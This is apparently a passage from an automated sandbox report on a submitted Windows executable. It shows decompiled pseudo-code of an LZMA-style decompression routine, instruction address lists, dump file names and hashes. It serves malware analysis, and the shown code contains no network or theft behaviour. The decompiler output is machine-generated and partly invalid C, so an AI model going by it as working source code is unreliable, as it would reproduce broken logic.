									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                          0x00406194
                          0x0040619b
                          0x004061a1
                          0x004061a7
                          0x00000000
                          0x004061ab
                          0x004061b7
                          0x004061b7
                          0x004061b7
                          0x004061c0
                          0x00000000
                          0x00000000
                          0x004061c6
                          0x00000000
                          0x004061cd
                          0x004061d1
                          0x00000000
                          0x00000000
                          0x004061da
                          0x004061dd
                          0x004061e0
                          0x004061e2
                          0x004061e4
                          0x00000000
                          0x00000000
                          0x004061ea
                          0x004061ed
                          0x004061ef
                          0x004061f0
                          0x004061f3
                          0x004061f5
                          0x004061f6
                          0x004061f8
                          0x004061fb
                          0x00406200
                          0x00406205
                          0x0040620e
                          0x00406221
                          0x00406224
                          0x0040622d
                          0x00406230
                          0x00406258
                          0x00406258
                          0x0040625a
                          0x00406268
                          0x00406268
                          0x0040626c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040625c
                          0x0040625c
                          0x0040625f
                          0x0040625f
                          0x00406260
                          0x00406260
                          0x00000000
                          0x0040625c
                          0x00406232
                          0x00406236
                          0x0040623b
                          0x0040623b
                          0x00406244
                          0x0040624a
                          0x0040624c
                          0x0040624f
                          0x00000000
                          0x00406255
                          0x00406255
                          0x00000000
                          0x00406255
                          0x00000000
                          0x00406272
                          0x00406272
                          0x00406276
                          0x00406b22
                          0x00000000
                          0x00406b22
                          0x0040627f
                          0x0040628f
                          0x00406292
                          0x00406295
                          0x00406295
                          0x00406295
                          0x00406298
                          0x00406298
                          0x0040629c
                          0x00000000
                          0x00000000
                          0x0040629e
                          0x004062a1
                          0x004062a4
                          0x004062ce
                          0x004062d4
                          0x004062db
                          0x00000000
                          0x004062db
                          0x004062a6
                          0x004062aa
                          0x004062ad
                          0x004062b2
                          0x004062b2
                          0x004062bd
                          0x004062c3
                          0x004062c5
                          0x004062c8
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040630d
                          0x00406313
                          0x00406316
                          0x00406323
                          0x0040632b
                          0x00000000
                          0x00000000
                          0x004062e2
                          0x004062e2
                          0x004062e6
                          0x00406b31
                          0x00000000
                          0x00406b31
                          0x004062f2
                          0x004062fd
                          0x004062fd
                          0x004062fd
                          0x00406300
                          0x00406303
                          0x00406306
                          0x00406309
                          0x0040630b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004069a2
                          0x004069a2
                          0x004069a8
                          0x004069ae
                          0x004069b1
                          0x004069b4
                          0x004069ce
                          0x004069d1
                          0x004069d7
                          0x004069e2
                          0x004069e2
                          0x004069e4
                          0x004069b6
                          0x004069b6
                          0x004069c5
                          0x004069c9
                          0x004069c9
                          0x004069e7
                          0x004069ee
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004069f0
                          0x004069f0
                          0x004069f4
                          0x00406ba3
                          0x00000000
                          0x00406ba3
                          0x00406a00
                          0x00406a07
                          0x00406a0f
                          0x00406a0f
                          0x00406a0f
                          0x00406a12
                          0x00406a15
                          0x00406a15
                          0x00000000
                          0x00000000
                          0x00406333
                          0x00406335
                          0x00406338
                          0x004063a9
                          0x004063ac
                          0x004063af
                          0x004063b6
                          0x004063c0
                          0x00000000
                          0x004063c0
                          0x0040633a
                          0x0040633e
                          0x00406341
                          0x00406343
                          0x00406346
                          0x00406349
                          0x0040634b
                          0x0040634e
                          0x00406350
                          0x00406355
                          0x00406358
                          0x0040635b
                          0x0040635f
                          0x00406366
                          0x00406369
                          0x00406370
                          0x00406374
                          0x0040637c
                          0x0040637c
                          0x0040637c
                          0x00406376
                          0x00406376
                          0x00406376
                          0x0040636b
                          0x0040636b
                          0x0040636b
                          0x00406380
                          0x00406383
                          0x004063a1
                          0x004063a3
                          0x00000000
                          0x004063a3
                          0x00406385
                          0x00406388
                          0x0040638b
                          0x0040638e
                          0x00406390
                          0x00406390
                          0x00406390
                          0x00406393
                          0x00406396
                          0x00406398
                          0x00406399
                          0x0040639c
                          0x00000000
                          0x00000000
                          0x004065d2
                          0x004065d6
                          0x004065f4
                          0x004065f7
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x00406607
                          0x0040660a
                          0x0040660d
                          0x0040660f
                          0x00406616
                          0x00406617
                          0x00406619
                          0x0040661c
                          0x0040661f
                          0x00406622
                          0x00406622
                          0x00406627
                          0x00000000
                          0x00406627
                          0x004065d8
                          0x004065db
                          0x004065de
                          0x004065e8
                          0x00000000
                          0x00000000
                          0x0040663c
                          0x00406640
                          0x00406663
                          0x00406666
                          0x00406669
                          0x00406673
                          0x00406642
                          0x00406642
                          0x00406645
                          0x00406648
                          0x0040664b
                          0x00406658
                          0x0040665b
                          0x0040665b
                          0x00000000
                          0x00000000
                          0x0040667f
                          0x00406683
                          0x00000000
                          0x00000000
                          0x00406689
                          0x0040668d
                          0x00000000
                          0x00000000
                          0x00406693
                          0x00406695
                          0x00406699
                          0x00406699
                          0x0040669c
                          0x004066a0
                          0x00000000
                          0x00000000
                          0x004066f0
                          0x004066f4
                          0x004066fb
                          0x004066fe
                          0x00406701
                          0x0040670b
                          0x00000000
                          0x0040670b
                          0x004066f6
                          0x00000000
                          0x00000000
                          0x00406717
                          0x0040671b
                          0x00406722
                          0x00406725
                          0x00406728
                          0x0040671d
                          0x0040671d
                          0x0040671d
                          0x0040672b
                          0x0040672e
                          0x00406731
                          0x00406731
                          0x00406734
                          0x00406737
                          0x0040673a
                          0x0040673a
                          0x0040673d
                          0x00406744
                          0x00406749
                          0x00000000
                          0x00000000
                          0x004067d7
                          0x004067d7
                          0x004067db
                          0x00406b79
                          0x00000000
                          0x00406b79
                          0x004067e1
                          0x004067e4
                          0x004067e7
                          0x004067eb
                          0x004067ee
                          0x004067f4
                          0x004067f6
                          0x004067f6
                          0x004067f6
                          0x004067f9
                          0x004067fc
                          0x00000000
                          0x00000000
                          0x004063cc
                          0x004063cc
                          0x004063d0
                          0x00406b3d
                          0x00000000
                          0x00406b3d
                          0x004063d6
                          0x004063d9
                          0x004063dc
                          0x004063e0
                          0x004063e3
                          0x004063e9
                          0x004063eb
                          0x004063eb
                          0x004063eb
                          0x004063ee
                          0x004063f1
                          0x004063f1
                          0x004063f4
                          0x004063f7
                          0x00000000
                          0x00000000
                          0x004063fd
                          0x00406403
                          0x00000000
                          0x00000000
                          0x00406409
                          0x00406409
                          0x0040640d
                          0x00406410
                          0x00406413
                          0x00406416
                          0x00406419
                          0x0040641a
                          0x0040641d
                          0x0040641f
                          0x00406425
                          0x00406428
                          0x0040642b
                          0x0040642e
                          0x00406431
                          0x00406434
                          0x00406437
                          0x00406453
                          0x00406456
                          0x00406459
                          0x0040645c
                          0x00406463
                          0x00406467
                          0x00406469
                          0x0040646d
                          0x00406439
                          0x00406439
                          0x0040643d
                          0x00406445
                          0x0040644a
                          0x0040644c
                          0x0040644e
                          0x0040644e
                          0x00406470
                          0x00406477
                          0x0040647a
                          0x00000000
                          0x00406480
                          0x00000000
                          0x00406480
                          0x00000000
                          0x00406485
                          0x00406485
                          0x00406489
                          0x00406b49
                          0x00000000
                          0x00406b49
                          0x0040648f
                          0x00406492
                          0x00406495
                          0x00406499
                          0x0040649c
                          0x004064a2
                          0x004064a4
                          0x004064a4
                          0x004064a4
                          0x004064a7
                          0x004064aa
                          0x004064aa
                          0x004064aa
                          0x004064b0
                          0x00000000
                          0x00000000
                          0x004064b2
                          0x004064b5
                          0x004064b8
                          0x004064bb
                          0x004064be
                          0x004064c1
                          0x004064c4
                          0x004064c7
                          0x004064ca
                          0x004064cd
                          0x004064d0
                          0x004064e8
                          0x004064eb
                          0x004064ee
                          0x004064f1
                          0x004064f1
                          0x004064f4
                          0x004064f8
                          0x004064fa
                          0x004064d2
                          0x004064d2
                          0x004064da
                          0x004064df
                          0x004064e1
                          0x004064e3
                          0x004064e3
                          0x004064fd
                          0x00406504
                          0x00406507
                          0x00000000
                          0x00406509
                          0x00000000
                          0x00406509
                          0x00406507
                          0x0040650e
                          0x0040650e
                          0x0040650e
                          0x0040650e
                          0x00000000
                          0x00000000
                          0x00406549
                          0x00406549
                          0x0040654d
                          0x00406b55
                          0x00000000
                          0x00406b55
                          0x00406553
                          0x00406556
                          0x00406559
                          0x0040655d
                          0x00406560
                          0x00406566
                          0x00406568
                          0x00406568
                          0x00406568
                          0x0040656b
                          0x0040656e
                          0x0040656e
                          0x00406574
                          0x00406512
                          0x00406512
                          0x00406515
                          0x00000000
                          0x00406515
                          0x00406576
                          0x00406576
                          0x00406579
                          0x0040657c
                          0x0040657f
                          0x00406582
                          0x00406585
                          0x00406588
                          0x0040658b
                          0x0040658e
                          0x00406591
                          0x00406594
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b5
                          0x004065b8
                          0x004065bc
                          0x004065be
                          0x00406596
                          0x00406596
                          0x0040659e
                          0x004065a3
                          0x004065a5
                          0x004065a7
                          0x004065a7
                          0x004065c1
                          0x004065c8
                          0x004065cb
                          0x00000000
                          0x004065cd
                          0x00000000
                          0x004065cd
                          0x00000000
                          0x0040685a
                          0x0040685a
                          0x0040685e
                          0x00406b85
                          0x00000000
                          0x00406b85
                          0x00406864
                          0x00406867
                          0x0040686a
                          0x0040686e
                          0x00406871
                          0x00406877
                          0x00406879
                          0x00406879
                          0x00406879
                          0x0040687c
                          0x00000000
                          0x00000000
                          0x0040662a
                          0x0040662a
                          0x0040662d
                          0x00000000
                          0x00000000
                          0x00406969
                          0x0040696d
                          0x0040698f
                          0x00406992
                          0x0040699c
                          0x0040699f
                          0x0040699f
                          0x00000000
                          0x0040699f
                          0x0040696f
                          0x00406972
                          0x00406976
                          0x00406979
                          0x00406979
                          0x0040697c
                          0x00000000
                          0x00000000
                          0x00406a26
                          0x00406a2a
                          0x00406a48
                          0x00406a48
                          0x00406a48
                          0x00406a4f
                          0x00406a56
                          0x00406a5d
                          0x00406a5d
                          0x00000000
                          0x00406a5d
                          0x00406a2c
                          0x00406a2f
                          0x00406a32
                          0x00406a35
                          0x00406a3c
                          0x00406980
                          0x00406980
                          0x00406983
                          0x00000000
                          0x00000000
                          0x00406b17
                          0x00406b1a
                          0x00000000
                          0x00000000
                          0x00406751
                          0x00406753
                          0x0040675a
                          0x0040675b
                          0x0040675d
                          0x00406760
                          0x00000000
                          0x00000000
                          0x00406768
                          0x0040676b
                          0x0040676e
                          0x00406770
                          0x00406772
                          0x00406772
                          0x00406773
                          0x00406776
                          0x0040677d
                          0x00406780
                          0x0040678e
                          0x00000000
                          0x00000000
                          0x00406a64
                          0x00406a64
                          0x00406a67
                          0x00406a6e
                          0x00000000
                          0x00000000
                          0x00406a73
                          0x00406a73
                          0x00406a77
                          0x00406baf
                          0x00000000
                          0x00406baf
                          0x00406a7d
                          0x00406a80
                          0x00406a83
                          0x00406a87
                          0x00406a8a
                          0x00406a90
                          0x00406a92
                          0x00406a92
                          0x00406a92
                          0x00406a95
                          0x00406a98
                          0x00406a98
                          0x00406a98
                          0x00406a98
                          0x00406a9b
                          0x00406a9b
                          0x00406a9f
                          0x00406aff
                          0x00406b02
                          0x00406b07
                          0x00406b08
                          0x00406b0a
                          0x00406b0c
                          0x00406b0f
                          0x00406a1b
                          0x00406a1b
                          0x00000000
                          0x00406a1b
                          0x00406aa1
                          0x00406aa7
                          0x00406aaa
                          0x00406aad
                          0x00406ab0
                          0x00406ab3
                          0x00406ab6
                          0x00406ab9
                          0x00406abc
                          0x00406abf
                          0x00406ac2
                          0x00406adb
                          0x00406ade
                          0x00406ae1
                          0x00406ae4
                          0x00406ae8
                          0x00406aea
                          0x00406aea
                          0x00406aeb
                          0x00406aee
                          0x00406ac4
                          0x00406ac4
                          0x00406acc
                          0x00406ad1
                          0x00406ad3
                          0x00406ad6
                          0x00406ad6
                          0x00406af1
                          0x00406af8
                          0x00000000
                          0x00406afa
                          0x00000000
                          0x00406afa
                          0x00000000
                          0x00406796
                          0x00406799
                          0x004067cf
                          0x004068ff
                          0x004068ff
                          0x004068ff
                          0x004068ff
                          0x00406902
                          0x00406902
                          0x00406905
                          0x00406907
                          0x00406b91
                          0x00000000
                          0x00406b91
                          0x0040690d
                          0x00406910
                          0x00000000
                          0x00000000
                          0x00406916
                          0x0040691a
                          0x0040691d
                          0x0040691d
                          0x0040691d
                          0x00000000
                          0x0040691d
                          0x0040679b
                          0x0040679d
                          0x0040679f
                          0x004067a1
                          0x004067a4
                          0x004067a5
                          0x004067a7
                          0x004067a9
                          0x004067ac
                          0x004067af
                          0x004067c5
                          0x004067ca
                          0x00406802
                          0x00406802
                          0x00406806
                          0x00406832
                          0x00406834
                          0x0040683b
                          0x0040683e
                          0x00406841
                          0x00406841
                          0x00406846
                          0x00406846
                          0x00406848
                          0x0040684b
                          0x00406852
                          0x00406855
                          0x00406882
                          0x00406882
                          0x00406885
                          0x00406888
                          0x004068fc
                          0x004068fc
                          0x004068fc
                          0x00000000
                          0x004068fc
                          0x0040688a
                          0x00406890
                          0x00406893
                          0x00406896
                          0x00406899
                          0x0040689c
                          0x0040689f
                          0x004068a2
                          0x004068a5
                          0x004068a8
                          0x004068ab
                          0x004068c4
                          0x004068c6
                          0x004068c9
                          0x004068ca
                          0x004068cd
                          0x004068cf
                          0x004068d2
                          0x004068d4
                          0x004068d6
                          0x004068d9
                          0x004068db
                          0x004068de
                          0x004068e2
                          0x004068e4
                          0x004068e4
                          0x004068e5
                          0x004068e8
                          0x004068eb
                          0x004068ad
                          0x004068ad
                          0x004068b5
                          0x004068ba
                          0x004068bc
                          0x004068bf
                          0x004068bf
                          0x004068ee
                          0x004068f5
                          0x0040687f
                          0x0040687f
                          0x0040687f
                          0x0040687f
                          0x00000000
                          0x004068f7
                          0x00000000
                          0x004068f7
                          0x004068f5
                          0x00406808
                          0x0040680b
                          0x0040680d
                          0x00406810
                          0x00406813
                          0x00406816
                          0x00406818
                          0x0040681b
                          0x0040681e
                          0x0040681e
                          0x00406821
                          0x00406821
                          0x00406824
                          0x0040682b
                          0x004067ff
                          0x004067ff
                          0x004067ff
                          0x004067ff
                          0x00000000
                          0x0040682d
                          0x00000000
                          0x0040682d
                          0x0040682b
                          0x004067b1
                          0x004067b4
                          0x004067b6
                          0x004067b9
                          0x00000000
                          0x00000000
                          0x00406518
                          0x00406518
                          0x0040651c
                          0x00406b61
                          0x00000000
                          0x00406b61
                          0x00406522
                          0x00406525
                          0x00406528
                          0x0040652b
                          0x0040652e
                          0x00406531
                          0x00406534
                          0x00406536
                          0x00406539
                          0x0040653c
                          0x0040653f
                          0x00406541
                          0x00406541
                          0x00406541
                          0x00000000
                          0x00000000
                          0x004066a3
                          0x004066a3
                          0x004066a7
                          0x00406b6d
                          0x00000000
                          0x00406b6d
                          0x004066ad
                          0x004066b0
                          0x004066b3
                          0x004066b6
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x004066bb
                          0x004066be
                          0x004066c1
                          0x004066c4
                          0x004066c7
                          0x004066ca
                          0x004066cb
                          0x004066cd
                          0x004066cd
                          0x004066cd
                          0x004066d0
                          0x004066d3
                          0x004066d6
                          0x004066d9
                          0x004066d9
                          0x004066d9
                          0x004066dc
                          0x004066de
                          0x004066de
                          0x00000000
                          0x00000000
                          0x00406920
                          0x00406920
                          0x00406920
                          0x00406924
                          0x00000000
                          0x00000000
                          0x0040692a
                          0x0040692d
                          0x00406930
                          0x00406933
                          0x00406935
                          0x00406935
                          0x00406935
                          0x00406938
                          0x0040693b
                          0x0040693e
                          0x00406941
                          0x00406944
                          0x00406947
                          0x00406948
                          0x0040694a
                          0x0040694a
                          0x0040694a
                          0x0040694d
                          0x00406950
                          0x00406953
                          0x00406956
                          0x00406959
                          0x0040695d
                          0x0040695f
                          0x00406962
                          0x00000000
                          0x00406964
                          0x004066e1
                          0x004066e1
                          0x00000000
                          0x004066e1
                          0x00406962
                          0x00406b97
                          0x00406bb9
                          0x00406bbf
                          0x00406bc1
                          0x00406bc8
                          0x00000000
                          0x00000000
                          0x004061c6
                          0x00406bce
                          0x00406bce
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a98843a46fb9b62412bae302801de079c6452d7d4a4e23dbd568dc37708913b5
                          • Instruction ID: a0ed0051221df213f48a7fa37d6c1b626956e64e776f215132b6db312d3b92b6
                          • Opcode Fuzzy Hash: a98843a46fb9b62412bae302801de079c6452d7d4a4e23dbd568dc37708913b5
                          • Instruction Fuzzy Hash: 10816671D04228DBDF24CFA8C8447ADBBB0FB45301F1181AAD856BB281D7786A96DF44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004065D2 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                          Download Yara Rule
                          C-Code - Quality: 98%
                          			E004065D2() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00406BD6))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
